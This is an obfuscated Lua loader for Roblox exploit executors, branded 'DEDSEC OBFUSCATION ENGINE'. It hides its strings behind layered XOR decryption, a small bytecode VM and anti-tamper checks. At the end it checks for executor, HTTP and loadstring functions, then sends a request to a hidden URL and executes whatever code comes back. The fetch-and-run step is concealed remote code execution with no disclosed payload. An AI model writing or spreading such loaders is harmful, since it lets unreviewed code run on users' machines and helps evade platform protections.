--[[

‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚ĖĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚ĖĎ‚ĖĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚ĖĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚ĖĎ
‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚ēź‚ēĚ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚ēź‚ēĚ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚ēź‚ēĚ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó
‚Ėą‚Ėą‚ēĎ‚ĖĎ‚ĖĎ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚ĖĎ‚ĖĎ‚Ėą‚Ėą‚ēĎ‚ĖĎ‚ĖĎ‚Ėą‚Ėą‚ēĎ‚ēö‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚ĖĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚ĖĎ‚ĖĎ‚Ėą‚Ėą‚ēĎ‚ĖĎ‚ĖĎ‚ēö‚ēź‚ēĚ
‚Ėą‚Ėą‚ēĎ‚ĖĎ‚ĖĎ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēĚ‚ĖĎ‚ĖĎ‚Ėą‚Ėą‚ēĎ‚ĖĎ‚ĖĎ‚Ėą‚Ėą‚ēĎ‚ĖĎ‚ēö‚ēź‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēĚ‚ĖĎ‚ĖĎ‚Ėą‚Ėą‚ēĎ‚ĖĎ‚ĖĎ‚Ėą‚Ėą‚ēó
‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚ēö‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ
‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ‚ĖĎ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ‚ĖĎ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ‚ĖĎ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ‚ĖĎ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēĚ‚ĖĎ

‚Ėą‚ĖĄ‚ĒÄ‚ĖĄ‚ĖĄ‚ĒÄ‚Ėą‚Ėą‚ĖÄ‚ĖĄ‚ĒÄ‚Ėą‚Ėą‚ĖĄ‚ĒÄ‚ĖĄ‚ĖĄ‚ĖÄ‚Ėą‚ĖĄ‚ĒÄ‚ĖĄ‚ĖĄ‚ĒÄ‚Ėą‚ĒÄ‚ĖĄ‚ĖĄ‚ĖĄ‚ĖĄ‚Ėą
‚Ėą‚Ėą‚ĒÄ‚ĖĄ‚Ėą‚Ėą‚Ėą‚Ėą‚ĒÄ‚ĖÄ‚ĒÄ‚Ėą‚Ėą‚Ėą‚ĒÄ‚ĖĄ‚ĒÄ‚ĖĄ‚Ėą‚Ėą‚ĒÄ‚ĖĄ‚Ėą‚ĖÄ‚Ėą‚ĖĄ‚ĖĄ‚ĖĄ‚ĖĄ‚ĒÄ‚Ėą
‚ĖÄ‚ĖĄ‚ĖĄ‚ĖĄ‚ĖÄ‚ĖÄ‚ĖÄ‚ĖĄ‚ĖĄ‚ĖÄ‚ĖĄ‚ĖĄ‚ĖÄ‚ĖĄ‚ĖĄ‚ĖÄ‚ĖĄ‚ĖĄ‚ĖÄ‚ĖĄ‚ĖĄ‚ĖĄ‚ĖĄ‚ĖĄ‚ĖÄ‚ĖĄ‚ĖĄ‚ĖĄ‚ĖĄ‚ĖĄ‚ĖÄ


                DEDSEC OBFUSCATION ENGINE  
            https://discord.gg/GWefVSwgNJ

  
--]]

local _DOK,_DERR=pcall(function() local _56c28a8=false;local _5b1ac6e=(bit32 and bit32.bxor)or function(a,b)local r,p=0,1;for _=1,8 do local x,y=a%2,b%2;if x~=y then r=r+p end;a=(a-x)/2;b=(b-y)/2;p=p*2 end;return r end;local _661f454="\242\243\139\52\4\56\226\114\219\6\17\81\28\52\28\179\202\84\128\83\216\237\37\94\172\59\8\96\121\193\174\70\118\40\190\190\63\202\37\148\165\1\13\64\77\157\189\42\32\26\189\221\157\152\183\12\235\104\97\61\111\122\153\172";local _0823e37="\1\184\61\13\226\113\181\162\210\15\155\191\176\236\95\64\160\30\63\233\39\4\232\21\236\152\137\59\230\255\210\34\146\160\48\158\6\111\105\218\214\111\209\192\226\98\236\152\116\1\157\33\77\199\126\54\52\77\226\192\50\99\238\155\122\7\183\86\183\46\237\230\78\36\213\16\67\186\41\157\239\156\176\18\32\150\143\215\233\185\171\160\73\120\22\19\189\224\235\76\185\45\234\42\106\64\70\123\45\43\76\246\24\119\72\211\246\118\219\228\217\159\212\85\24\105\36\91\232\145\232\138\237\204\91\221\200\49\6\204\43\223\65\148\224\185\11\132\102\88\206\127\21\8\246\204\250\43\66\218\93\25\70\23\170\159\41\3\70\161\150\150";local _dd8f81a="\163\191\31\4\203\119\101\170\62\162\92\61\114\20\173\40\55\226\63\216\183\1\124\23\229\23\102\246\54\109\22\40\12\252\71\125\132\112\101\12\151\174\83\36\227\98\116\215\156\226\28\243\52\191\188\182\85\232\54\143\201\145\142\221\242\232\135\247\167\68\150\62\197\143\255\193\184\28\28\94\33\24\50\143\107\217\215\77\164\54\74\77\255\64\15\71\61\136\94\202\120\243\233\88\43\113\206\9\255\228\207\159\171\70\229\222\57\187\204";local _c7481fe="\66\140\6\50\31\236\130\61\170\71\113\5\68\113\148\188\241\162\252\176\37\154\55\165\30\191\206\63\199\122\11\87\168\0\64\159\242\150\45\5\248\153\201\37\53\226\206\226\220\96\221\127\213\7\141\141\55\80\171\17\149\141\242\92\78\108\56\248\101\60\9\253\127\48\206\207\230\217\172\204\44\85\98\186\227\1";local _1a8abe1="\233\109\240\38\226\215\87\254\95\142\160\94\198\70\38\60\110\144\166\247\218\166\101\229\43\185\182\58\78\14\43\131\121\181\116\4\165\42\181\240\112\80\30\159\139\203\82\108\152\221\46\139\73\130\127\211\112\20\30\173\248\68\13\204\177\54\134\112\5\51\197\116\227\92\173\189\205\112\254\99\59\128\234\191\36\110\90\86\28\114\216\87\58\203\201\184\28\93\159\83\237\62\165\236\50\183\114\175\100\224\150\5\58\11\235\84\184\131\19\173\118\55\209\211\236\120\249\38\210\233\207\184\137\74\190\63\24\141\51\215\34\120\8\7\249";local _f2665c5="\213\100\95\115\65\214\182\44\3\174\87\30\62\30\224\12\218\161\11\128\219\139\204\44\227\74\154\87\77\80\6\111\254\170\183\102\214\7\63\90\94\75\69\210\149\157\249\247\80\156\108\90\85\174\111\43\204\143\125\199\199\143\10\132\164\199\129\47\229\202\153\164\131\222\120\226\67\215\167\145\157\198\122\32\182\222\206";local _3a7b4e1={247,32,244,130,140,215,54,71,125,157,23,129,46,223,168,10,118,234,192,56,97,131,152,34};local _a3d1489={217,246,206,147,4,27,88,75,187,175,224,214,184,81,138,3,32,166,105,62,129,151,54,170};local _ad83afd={{7,11,100,4,0,200},{5,8,124,2,1,66},{9,13,103,3,1,216},{16,7,26,2,2,99},{12,1,168,5,0,157},{29,23,20,4,1,216},{13,17,54,5,1,151},{28,12,87,2,2,218},{38,20,48,5,0,93},{61,0,122,5,0,88},{69,15,153,5,2,216},{12,12,45,6,1,163},{5,11,151,1,1,15},{31,0,174,1,2,51},{26,10,40,3,1,192},{30,8,17,6,0,31},{35,13,11,1,0,194},{47,7,215,2,0,38},{90,7,89,5,2,73},{59,3,252,2,2,139},{59,22,11,4,1,239},{74,76,64,2,1,20},{37,21,100,3,1,175},{67,12,30,3,2,41},{43,0,47,6,1,77},{110,14,197,5,0,155},{53,2,96,1,0,144},{89,8,16,3,0,85},{49,19,71,6,2,252}};local _bd883fc={2,9,16,6,28,21,18,27,22,20,15,29,11,8,3,4,12,24,7,1,26,23,5,19,10,14,25,17,13};local _a5c4ec4={};local _4355e6d=96;local _9504850=45;local _00b4234=120;local _cc19c17=215;local _4a715fb=111;local _40acfde=100;do local function _us(buf,si) local lcg=((13347314+si*2654435761)%4294967296);if lcg==0 then lcg=1 end;local r={};for i=1,#buf do lcg=(lcg*1103515245+12345+si*7)%4294967296;local kb=math.floor(lcg/65536)%256;r[i]=string.char(_5b1ac6e(string.byte(buf,i),kb)) end;return table.concat(r) end;_661f454=_us(_661f454,0);_0823e37=_us(_0823e37,1);_dd8f81a=_us(_dd8f81a,2);_c7481fe=_us(_c7481fe,3);_1a8abe1=_us(_1a8abe1,4);_f2665c5=_us(_f2665c5,5);end;local _099335e={};local function _3bd5652()local salt=0;local ok1,t=pcall(function() return tick() end);if ok1 and type(t)=="number" then salt=math.floor((t*1000)%256) end;local ok2,j=pcall(function() return game and game.JobId end);if ok2 and type(j)=="string" and #j>0 then for i=1,#j do salt=(salt+string.byte(j,i))%256 end end;local ok3,tb=pcall(function() return debug and debug.traceback and debug.traceback("",1) end);if ok3 and type(tb)=="string" then for i=1,math.min(#tb,64) do salt=_5b1ac6e(salt,(string.byte(tb,i)*7)%256) end end;local _hx=0;_hx=_5b1ac6e(_hx,_4355e6d);_hx=_5b1ac6e(_hx,_9504850);_hx=_5b1ac6e(_hx,_00b4234);_hx=_5b1ac6e(_hx,_cc19c17);_hx=_5b1ac6e(_hx,_4a715fb);_hx=_5b1ac6e(_hx,_40acfde);salt=_5b1ac6e(salt,(_hx + 233)%256);salt=(salt*131+_5b1ac6e(salt,165))%256;for i=1,24 do _099335e[i]=_5b1ac6e(_3a7b4e1[i],_a3d1489[i]) end;return salt end;local _SALT=_3bd5652();local _e351f51={1,37830,1,31052,4,1,16355,5,1,46217,5,1,13774,5,1,47955,5,1,2900,3,8};local _9b16935={};local _92d76df=0;local _a7b3aa6={[4]=29,[8]=27,[6]=14,[7]=6,[1]=3,[2]=11,[5]=25,[3]=32};local _f41e318={};_f41e318[3]=function(pc) _9b16935[#_9b16935+1]=_e351f51[pc+1];return pc+2 end;_f41e318[11]=function(pc) local b=_9b16935[#_9b16935];_9b16935[#_9b16935]=nil;local a=_9b16935[#_9b16935];_9b16935[#_9b16935]=(a+b)%16777215;return pc+1 end;_f41e318[32]=function(pc) local b=_9b16935[#_9b16935];_9b16935[#_9b16935]=nil;local a=_9b16935[#_9b16935];_9b16935[#_9b16935]=_5b1ac6e(a,b);return pc+1 end;_f41e318[29]=function(pc) local n=_9b16935[#_9b16935]%24;_9b16935[#_9b16935]=nil;local a=_9b16935[#_9b16935];local hi=math.floor(a/(2^(24-n)));local lo=(a*(2^n))%16777216;_9b16935[#_9b16935]=(lo+hi)%16777215;return pc+1 end;_f41e318[25]=function(pc) local b=_9b16935[#_9b16935];_9b16935[#_9b16935]=nil;local a=_9b16935[#_9b16935];_9b16935[#_9b16935]=(a*b)%16777215;return pc+1 end;_f41e318[14]=function(pc) local k=_e351f51[pc+1];_9b16935[#_9b16935+1]=_099335e[k] or 0;return pc+2 end;_f41e318[6]=function(pc) local b=_9b16935[#_9b16935];_9b16935[#_9b16935]=nil;local a=_9b16935[#_9b16935];local v=(a-b)%16777215;if v<0 then v=v+16777215 end;_9b16935[#_9b16935]=v;return pc+1 end;_f41e318[27]=function(pc) _92d76df=_9b16935[#_9b16935] or 0;return -1 end;local function _72dbc2f() local pc=1;while pc>0 do local op=_e351f51[pc];if not op then break end;local bk=_a7b3aa6[op];if not bk then break end;local fn=_f41e318[bk];if not fn then break end;pc=fn(pc) end end;_72dbc2f();local function _csum(s) local t=0;for i=1,#s do t=(t+string.byte(s,i)) end;return t%16777215 end;local _5d919c2=((_csum(_661f454)+_csum(_0823e37)+_csum(_dd8f81a)+_csum(_c7481fe)+_csum(_1a8abe1)+_csum(_f2665c5))-88167)%256;if _5d919c2<0 then _5d919c2=_5d919c2+256 end;_5d919c2=(_5d919c2+(_5b1ac6e((_92d76df) or 0,1218621)%256))%256;_5d919c2=(_5d919c2+(_SALT*0))%256;do if string.byte("A",1)~=65 then _5d919c2=(_5d919c2+137)%256 end;if select("#",1,2,3)~=3 then _5d919c2=(_5d919c2+89)%256 end;if (table.concat({"a","b"},""))~="ab" then _5d919c2=(_5d919c2+211)%256 end;if string.sub("hello",2,3)~="el" then _5d919c2=(_5d919c2+47)%256 end;if math.floor(2.7)~=2 then _5d919c2=(_5d919c2+101)%256 end;if (#({1,2,3,4}))~=4 then _5d919c2=(_5d919c2+73)%256 end;local _can=(function(x) return x*3+7 end);if _can(11)~=40 then _5d919c2=(_5d919c2+157)%256 end;local t0=os.clock();local s=0;for i=1,2000 do s=s+i end;if (os.clock()-t0)>0.25 then _5d919c2=(_5d919c2+193)%256 end;end;local _e22a150=table.concat({[1]=string.char(108-10),[4]=string.char(116-15),[2]=string.char(137-16),[3]=string.char(132-16)});local _594eb33=table.concat({[3]=string.char(103-6),[4]=string.char(131-17),[2]=string.char(111-7),[1]=string.char(104-5)});local _21b2516=table.concat({[1]=string.char(124-9),[3]=string.char(106-8),[2]=string.char(120-3)});local _6df53a5=string[_e22a150];local _b8f0d89=string[_594eb33];local _975c76c=string[_21b2516];local _c2368dd="\224\200\243\162\167\72\72\107\224\96\127\186\231\177\206\180\220\226\37\181\146\112\84\72\11\179\250\120\222\214\71\24\246\23\192\78\223\160\84\116\202\42\163\194\138\131\242\203\174\41\116\98\132\198\239\227\93";local function _1285efa(a,b)local r={};for i=1,#_c2368dd do local v=_5b1ac6e(_6df53a5(_c2368dd,i),(a+b+i)%256);r[#r+1]=_b8f0d89(v%256) end;return table.concat(r) end;if false then local _=_1285efa(1,2) end;local _4296ca4="\229\177\26\141\20\250\160\13\95\186\235\106\178\190\33\85\105\109\166\211\241\233\215\45\104\174\83\91\49\234\79\36\156\204\221\86\75\129\100\195\186\87\254\234";local function _114f2c1(a,b)local r={};for i=1,#_4296ca4 do local v=_5b1ac6e(_6df53a5(_4296ca4,i),(a+b+i)%256);r[#r+1]=_b8f0d89(v%256) end;return table.concat(r) end;if false then local _=_114f2c1(1,2) end;local _29cd6bc="\198\158\159\18\92\212\134\252\178\189\175\10\162\86\105\21\223\204\27\225\61\249\221\67\177\75\52\96\191\163\120\123\236\196\241\12\8\156\125\191\61";local function _a459688(a,b)local r={};for i=1,#_29cd6bc do local v=_5b1ac6e(_6df53a5(_29cd6bc,i),(a+b+i)%256);r[#r+1]=_b8f0d89(v%256) end;return table.concat(r) end;if false then local _=_a459688(1,2) end;local _cb5d432="\195\246\206\190\132\208\9\239\157\44\167\4\87\166\119\96\113\194\209\231\108\254\255\158\27\168\224\4\36\3\75\220\163\251\190\2\141\56";local function _8f30a4f(a,b)local r={};for i=1,#_cb5d432 do local v=_5b1ac6e(_6df53a5(_cb5d432,i),(a+b+i)%256);r[#r+1]=_b8f0d89(v%256) end;return table.concat(r) end;if false then local _=_8f30a4f(1,2) end;local _286b7c3="";local function _18f41a7() return "" end;local function _bfbcfa8(pi)local c=_a5c4ec4[pi];if c then return c end;local ri=_bd883fc[pi];if not ri then return"" end;local m=_ad83afd[ri];if not m then return"" end;local off,n,nnm,sh,_vr,mcm=m[1],m[2],m[3],m[4],m[5],m[6];local nn=_5b1ac6e(nnm,55);local mac=_5b1ac6e(mcm,125);local src;if sh==1 then src=_661f454 elseif sh==2 then src=_0823e37 elseif sh==3 then src=_dd8f81a elseif sh==4 then src=_c7481fe elseif sh==5 then src=_1a8abe1 else src=_f2665c5 end;local cm=0;for j=1,n do cm=(cm+_6df53a5(src,off+j))%251 end;cm=(cm+nn*7+_vr*131+n*53)%251;local mg=0;if cm~=mac then mg=171 end;local shift=(nn%7)+1;local rshift=8-shift;local r={};for j=1,n do local b=_6df53a5(src,off+j);local k=_099335e[((j-1)%24)+1];local v=b;do local lo=math.floor(v/(2^shift));local hi=(v*(2^rshift))%256;v=(lo+hi)%256;v=_5b1ac6e(v,(k+(j-1)+2)%256);v=(v-nn-((2*53+(j-1)*7)%256))%256;if v<0 then v=((v%256)+256)%256 end;end;do local lo=math.floor(v/(2^shift));local hi=(v*(2^rshift))%256;v=(lo+hi)%256;v=_5b1ac6e(v,(k+(j-1)+1)%256);v=(v-nn-((1*53+(j-1)*7)%256))%256;if v<0 then v=((v%256)+256)%256 end;end;do local lo=math.floor(v/(2^shift));local hi=(v*(2^rshift))%256;v=(lo+hi)%256;v=_5b1ac6e(v,(k+(j-1)+0)%256);v=(v-nn-((0*53+(j-1)*7)%256))%256;if v<0 then v=((v%256)+256)%256 end;end;v=_5b1ac6e(v,_5d919c2);v=_5b1ac6e(v,mg);r[j]=_b8f0d89(v) end;local out=table.concat(r);_a5c4ec4[pi]=out;return out end;local function _6eb398c(pi)local c=_a5c4ec4[pi];if c then return c end;local ri=_bd883fc[pi];if not ri then return"" end;local m=_ad83afd[ri];if not m then return"" end;local off,n,nnm,sh,_vr,mcm=m[1],m[2],m[3],m[4],m[5],m[6];local nn=_5b1ac6e(nnm,55);local mac=_5b1ac6e(mcm,125);local src;if sh==1 then src=_661f454 elseif sh==2 then src=_0823e37 elseif sh==3 then src=_dd8f81a elseif sh==4 then src=_c7481fe elseif sh==5 then src=_1a8abe1 else src=_f2665c5 end;local cm=0;for j=1,n do cm=(cm+_6df53a5(src,off+j))%251 end;cm=(cm+nn*7+_vr*131+n*53)%251;local mg=0;if cm~=mac then mg=171 end;local shift=(nn%7)+1;local rshift=8-shift;local r={};for j=1,n do local b=_6df53a5(src,off+j);local k=_099335e[((j-1)%24)+1];local v=b;do v=(v+1)%256;v=_5b1ac6e(v,(k+nn+2)%256);v=(v-nn-(j-1)-2)%256;if v<0 then v=((v%256)+256)%256 end;v=_5b1ac6e(v,(k+((2*53+(j-1)*7)%256))%256);end;do v=(v+1)%256;v=_5b1ac6e(v,(k+nn+1)%256);v=(v-nn-(j-1)-1)%256;if v<0 then v=((v%256)+256)%256 end;v=_5b1ac6e(v,(k+((1*53+(j-1)*7)%256))%256);end;do v=(v+1)%256;v=_5b1ac6e(v,(k+nn+0)%256);v=(v-nn-(j-1)-0)%256;if v<0 then v=((v%256)+256)%256 end;v=_5b1ac6e(v,(k+((0*53+(j-1)*7)%256))%256);end;v=_5b1ac6e(v,_5d919c2);v=_5b1ac6e(v,mg);r[j]=_b8f0d89(v) end;local out=table.concat(r);_a5c4ec4[pi]=out;return out end;local function _fc3736f(pi)local c=_a5c4ec4[pi];if c then return c end;local ri=_bd883fc[pi];if not ri then return"" end;local m=_ad83afd[ri];if not m then return"" end;local off,n,nnm,sh,_vr,mcm=m[1],m[2],m[3],m[4],m[5],m[6];local nn=_5b1ac6e(nnm,55);local mac=_5b1ac6e(mcm,125);local src;if sh==1 then src=_661f454 elseif sh==2 then src=_0823e37 elseif sh==3 then src=_dd8f81a elseif sh==4 then src=_c7481fe elseif sh==5 then src=_1a8abe1 else src=_f2665c5 end;local cm=0;for j=1,n do cm=(cm+_6df53a5(src,off+j))%251 end;cm=(cm+nn*7+_vr*131+n*53)%251;local mg=0;if cm~=mac then mg=171 end;local shift=(nn%7)+1;local rshift=8-shift;local r={};for j=1,n do local b=_6df53a5(src,off+j);local k=_099335e[((j-1)%24)+1];local v=b;do v=(v-(j-1)-2)%256;if v<0 then v=((v%256)+256)%256 end;local hi=math.floor(v/(2^rshift));local lo=(v*(2^shift))%256;v=(lo+hi)%256;v=_5b1ac6e(v,_5b1ac6e(_5b1ac6e(k,nn),((2*53+(j-1)*7)%256)));end;do v=(v-(j-1)-1)%256;if v<0 then v=((v%256)+256)%256 end;local hi=math.floor(v/(2^rshift));local lo=(v*(2^shift))%256;v=(lo+hi)%256;v=_5b1ac6e(v,_5b1ac6e(_5b1ac6e(k,nn),((1*53+(j-1)*7)%256)));end;do v=(v-(j-1)-0)%256;if v<0 then v=((v%256)+256)%256 end;local hi=math.floor(v/(2^rshift));local lo=(v*(2^shift))%256;v=(lo+hi)%256;v=_5b1ac6e(v,_5b1ac6e(_5b1ac6e(k,nn),((0*53+(j-1)*7)%256)));end;v=_5b1ac6e(v,_5d919c2);v=_5b1ac6e(v,mg);r[j]=_b8f0d89(v) end;local out=table.concat(r);_a5c4ec4[pi]=out;return out end;local function _f026d53(pi) local ri=_bd883fc[pi];if not ri then return"" end;local m=_ad83afd[ri];if not m then return"" end;local vr=m[5];local s;if vr==0 then s=_bfbcfa8(pi) elseif vr==1 then s=_6eb398c(pi) else s=_fc3736f(pi) end;return s end;local function _315f736(pi) local ri=_bd883fc[pi];if not ri then return"" end;local m=_ad83afd[ri];if not m then return"" end;local vr=m[5];local s;if vr==0 then s=_bfbcfa8(pi) elseif vr==1 then s=_6eb398c(pi) else s=_fc3736f(pi) end;return s end;local function _493a11a(pi) local ri=_bd883fc[pi];if not ri then return"" end;local m=_ad83afd[ri];if not m then return"" end;local vr=m[5];local s;if vr==0 then s=_bfbcfa8(pi) elseif vr==1 then s=_6eb398c(pi) else s=_fc3736f(pi) end;return s end;local _c448e16=setmetatable({},{__index=function(_,i) return _f026d53(i) end});local _dacb7f9=setmetatable({},{__index=function(_,i) return _315f736(i) end});if false then local _=_c448e16[1]; local _2=_dacb7f9[2] end; local _0x2e989e3779b1=identifyexecutor or getexecutorname local _0xc54b3c6ef362=(syn and syn.request)or(http and http.request)or http_request or request local _0x69a2daa66d13=loadstring if type(_0x2e989e3779b1)~=_493a11a(1) then return warn(_493a11a(2))end if type(_0xc54b3c6ef362)~=_493a11a(3) then return warn(_315f736(4))end if type(_0x69a2daa66d13)~=_493a11a(5) then return warn(_315f736(6))end local _0x195878dde6c4=tostring(_0x2e989e3779b1()or _f026d53(7))local _0xc5a817156075=tostring(os.time())local function _0x3f2cb54cda26(_0x51a7538453d7)local _0x6210f1bbcd88=7 for _0xdf3e8ff34739=1,#_0x51a7538453d7 do _0x6210f1bbcd88=(_0x6210f1bbcd88*131+string.byte(_0x51a7538453d7,_0xdf3e8ff34739))%2147483647 end return string.format(_f026d53(8),_0x6210f1bbcd88)end local _0xa9ec2e2ac0ea=_0xc54b3c6ef362({Url=_f026d53(9),Method=_f026d53(10),Headers={[_f026d53(11)]=_315f736(12),[_f026d53(13)]=_315f736(14),[_493a11a(15)]=_315f736(16),[_493a11a(17)]=_493a11a(18),[_493a11a(19)]=_0x195878dde6c4,[_315f736(20)]=_0xc5a817156075,[_f026d53(21)]=_0x3f2cb54cda26(_315f736(22).._0xc5a817156075.._315f736(23).._0x195878dde6c4.._f026d53(24)),}})local _0x480bcc623a9b=_0xa9ec2e2ac0ea and(_0xa9ec2e2ac0ea.StatusCode or _0xa9ec2e2ac0ea.status or (8797-8797+68-68))or (230-230+11-11) local _0xc2566a99b44c=_0xa9ec2e2ac0ea and(_0xa9ec2e2ac0ea.Body or _0xa9ec2e2ac0ea.body or _493a11a(25))or _315f736(26) if _0x480bcc623a9b~=(2070-1870+17-17) or _0xc2566a99b44c==_493a11a(27) then return warn(_493a11a(28))end local _0xf6d78d12dfd,err=_0x69a2daa66d13(_0xc2566a99b44c)if not _0xf6d78d12dfd then return warn(_0x43baa708a7ae or _f026d53(29))end return _0xf6d78d12dfd() end);if not _DOK then warn("[DEDSEC] runtime fault: "..tostring(_DERR)) end;
